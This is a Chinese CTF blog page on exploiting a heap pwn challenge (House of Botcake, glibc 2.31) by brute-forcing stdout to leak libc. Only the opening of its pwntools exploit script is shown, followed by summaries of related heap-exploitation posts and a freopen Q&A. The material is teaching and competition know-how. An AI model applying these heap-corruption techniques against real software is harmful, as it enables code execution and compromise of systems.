house of botcake利用模板+爆破stdout泄露地址 glibc2.31

原创 已于 2022-11-12 20:03:37 修改 · 310 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2022-11-06 19:45:00 首次发布
本文详细解析了一道名为House of Botcake的PWN题目,通过构造特定的数据结构漏洞来实现任意代码执行。文章展示了如何利用gdb进行调试,并通过精心构造payload来泄露libc基地址,最终调用system函数执行/bin/sh命令。 
from pwn import *
context.update(os='linux',arch='amd64',log_level='debug')
#c=remote(b'node4.buuoj.cn',25937)
# c=process(b'./pwn1')
libc=ELF(b'/pwn/libc')


#def dbg():
#	gdb.attach(c,'''


#	b *$rebase(0x14a1)
#	b *$rebase(0x14f9)
#	b *$rebase(0x15d7)
#	b *$rebase(0x1684)
#
#
#	''')
def dbg():
    gdb.attach(c)
    pause()


def add(size,content):
	c.sendlineafter(b'choice : ',b'1')
	c.sendafter(b'Size: ',str(size))
	c.sendafter(b'Content: ',content)
	
	
	
	
def</
最低0.47元/天 解锁文章
ROP;Ret2libc应用详解;CTF-pwn writeup;pwntools,one_gadget应用
CHERRY_cong的博客
05-01 825
ROP;Ret2libc; CTF-pwn题writeup;pwntools,one_gadget解题 pwn1 逆向代码 // IDA 7.5 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+0h] [rbp-30h] BYREF init(); puts("Show me your code :D"); gets(buf, argv); return 0
【pwn】未知libc版本利用的一个蠢方法
Nothing
08-17 1643
前几天看了一道题,题目本身还是比较常规的,这题的预期解法是通过_dl_runtime_resolve来做的。但我就是想用栈溢出+栈迁移碰一碰,整了半天就差onegadget地址了,查了一下libc search发现找不到对应的版本,可能出题人就是想用一个比较偏的libc版本把这条路封死,但我最后还是硬怼出来了。以后如果遇到了数据库中找不到对应的libc版本的时候可以尝试一下这种方法(当然ctf题中一般不会出个很偏的libc版本)。 条件:1.libc中的一个任意地址(通过泄露got表就可得到)。2.可以通过
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1884
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
house_of_botcake
m0_62326489的博客
08-28 292
【八芒星计划】 劫持_IO_2_1_stdout_泄露libc
carol2358的博客
09-02 1325
这一篇讲劫持_IO_2_1_stdout_泄露libc,应用在没有show的heap题里,首先申明,所有的都需要爆破,并且2.27由于tcache的存在使得2.27的劫持_IO_2_1_stdout_比2.23简单 文章目录CISCN2020 easyboxsmaj CISCN2020 easyboxs libc2.23 off by one+劫持_IO_2_1_stdout_ 有add和free add(0, 0x18, 'a') add(1, 0xf8, 'a') add(2, 0x68, 'a'
glibc2.31下的新double free手法/字节跳动pwn题gun题解
chennbnbnb的博客
12-02 4891
回顾double free手法 在glibc2.27之前,主要是fastbin double free: fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,会检查size字段是不是属于这个fastbin,因此往往需要伪造一个size glibc2.27~glibc2.28,主要是tcache double free 相较于fastbin double fr
ycb2020babypwn(unsortedbin爆破stdout泄露)
qq_33590156的博客
12-04 525
题目没有leak函数,肯定得打stdout,但是又是个2.23,有指针没清零的漏洞 在stdout-0x43的地方有0x7f的size,而且和main_arena+88很近,最后三位固定是0x5dd,所以需要爆破第二个字节的高位,概率是1/16。这应该是没leak的通用打法 然后题目是通过double free,控制堆块,修改size进unsortedbin,然后爆破fd,申请出stdout泄露libc,最后打malloc_hook和realloc去getshell。 操作 首先肯定是double free
Magic_Book(stdout泄露地址
FUCKING12的博客
11-03 343
箭头所指的chunk在tcachebins和unsortedbin里面,同时unsortdbin里面还有main_arena+96的地址和堆地址,我们可以利用2个残余地址爆破stdout。首先是分别改了这2处的2字节,这么改的目的是:可以将chunk分配到stdout附近,然后就可以修改stdout里面的数据,来泄露地址。tcachebins是不检查你的size的,所以可以随便利用其分配到你想要的地址去。因为我们没有show函数无法泄露地址,所以我们需要打stdout泄露地址
重学IO:利用_IO_2_1_stdout泄露libc
2301_79327647的博客
08-19 1232
这几天做IO类的题,发现自己是真的菜,决定暂时放一放apple1的学习,重新学习一下IO流。 本篇源码还是glibc-2.35。
2.27 house of botcake
2301_79879963的博客
05-31 1713
2.23-2.39 都有double free 针对fastbin2.27-2.35 tcachebin引入之后没有double free,但是可以有其他方式来间接实现double free理论上的double free:free 0xa0大小的堆块进入tcachebin 满7个(实际下标为0-6),free第8个同大小堆块时则会进入unsortedbin,这时从tcachebin申请回来一个堆块,再free第8个堆块,就进入了tcachebin,这样实现了理论上的double free,但是实际上这样操作
2020祥云杯 CTFNu1L.pdf
03-15
2020祥云杯 CTF WP 高清PDF版
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
m0_73756460的博客
07-10 407
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
De1ctf收获:用_IO_2_1_stdout_泄露libc地址 weapon的writeup
哒君的博客
08-11 1680
GitHub 例行公事 可以看出保护全开 进行分析 可以发现程序功能很简单 create delete rename create 限定大小最大只能是0x60 index只能是0-9但是是自个输入的 存在一个结构,struct[0] = size,struct[1] = ptr readn函数没有用\x00截断 delete 中间index的判断有问题,且存在uaf ren...
【我的 PWN 学习手札】House of Botcake —— tcache key 绕过
Mr_Fmnwon的博客
09-23 865
我们知道,自对 tcachebin 添加了 key 进行了 double free 检查后,利用起来薛微有些困难。double free 绕过检查机制,实则是因为释放时会检查 tcachebin 对应 size 的所有 free chunk。那么如果第二次 free 的 chunk 落入到其他 tcachebin,或者 fastbin,就可以实现绕过。【我的 PWN 学习手札】House of Karui —— tcache key 绕过手法-优快云博客。
【BUUCTF】roarctf_2019_realloc_magic---从一道题认识realloc函数+stdout泄露libc地址实战
Assassin
09-18 2302
realloc好题
针对简单Pwn溢出题的爆破
Rog's Blog
04-19 1173
爆破大法好 例子:BUUCTF rip 首先得到源程序pwn1 file pwn1 checksec pwn1 啥也没有,很好 然后拖到IDA64分析一波 发现漏洞函数,地址为 0x401186 ,很好 祭出脚本,开始爆破 from pwn import * def brute(i): payload=b'a'*i+p64(0x401186) p=remote('node3.buuoj.cn',28460) p.sendline(payload) p.interact
(BUUCTF)ycb_2020_easy_heap (glibc2.31off-by-null + orw)
xy1458214551的博客
01-14 1054
BUUCTF的ycb_2020_easy_heap题解,包含了glibc2.31下的off by null和orw
pwntools加载指定版本libc
weixin_44164182的博客
07-12 4074
关于在Linux中使用其他版本的libc执行二进制程序 1.查看本机libc版本 ldd --version 获取所需目标版本libc,可参考 https://github.com/niklasb/libc-database 2. libc文件和libc-dbg文件 libc.so文件为包含代码的、加载进目标进程地址空间的文件,一般发布时不带调试信息,直接使用这种so文件加载,在pwndbg中使用bin、heap等命令将提示无符号信息。 bins: This command only works w
CTF pwn中利用pwntools加载不同版本libc调试程序的方法
Assassin
04-09 5414
在网上找到了很多加载libc的帖子,终于自己走通了一次,现在把方法和资源都整理一下 一、解决方案 python利用pwntools的代码 from pwn import * import pwnlib context(os='linux',arch='amd64',log_level='debug') if __name__ == '__main__': conn = process(['./ld-2.23.so','./pwn'], env = {'LD_PRELOAD' : './libc-2.2
freopen("/dev/ttyS0", "r+", stdout);和freopen("/dev/console", "r+", stdout);有什么区别
最新发布
10-31
`freopen("/dev/ttyS0", "r+", stdout);` 和 `freopen("/dev/console", "r+", stdout);` 都是用来重定向标准输入输出流的语句,但它们指向的设备不同,用途和行为也有区别。 ### 1. `freopen("/dev/ttyS0", "r+", stdout);` - **含义**:将标准输出(`stdout`)重定向到串口设备 `/dev/ttyS0`,同时也以读写方式打开该设备。 - **用途**:通常用于嵌入式系统或服务器环境中,通过串口进行调试或输出日志。 - **行为**:程序的输出会通过串口发送出去,可以被连接到串口的终端或调试工具接收。 - **特点**:ttyS0 是串口终端设备,通常用于远程控制或调试,需要串口连接工具(如 minicom、PuTTY)来查看输出。 ### 2. `freopen("/dev/console", "r+", stdout);` - **含义**:将标准输出重定向到系统控制台 `/dev/console`。 - **用途**:用于将输出发送到系统主控制台(通常是直接连接到显示器和键盘的终端)。 - **行为**:程序的输出会显示在系统主控制台上。 - **特点**:/dev/console 是系统默认的控制台设备,通常用于系统启动、内核日志输出等关键信息的显示。 ### 区别总结: | 项目 | `/dev/ttyS0` | `/dev/console` | |------|---------------|----------------| | 设备类型 | 串口终端设备 | 系统主控制台设备 | | 常见用途 | 远程调试、串口通信 | 显示系统启动信息、内核日志 | | 输出目标 | 串口连接的终端 | 本地显示器 | | 是否需要串口工具 | 是 | 否 | ### 示例: ```c #include <stdio.h> int main() { // 重定向输出到串口 freopen("/dev/ttyS0", "r+", stdout); printf("This message is sent via serial port.\n"); // 重定向输出到系统控制台 freopen("/dev/console", "r+", stdout); printf("This message is displayed on the console.\n"); return 0; } ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值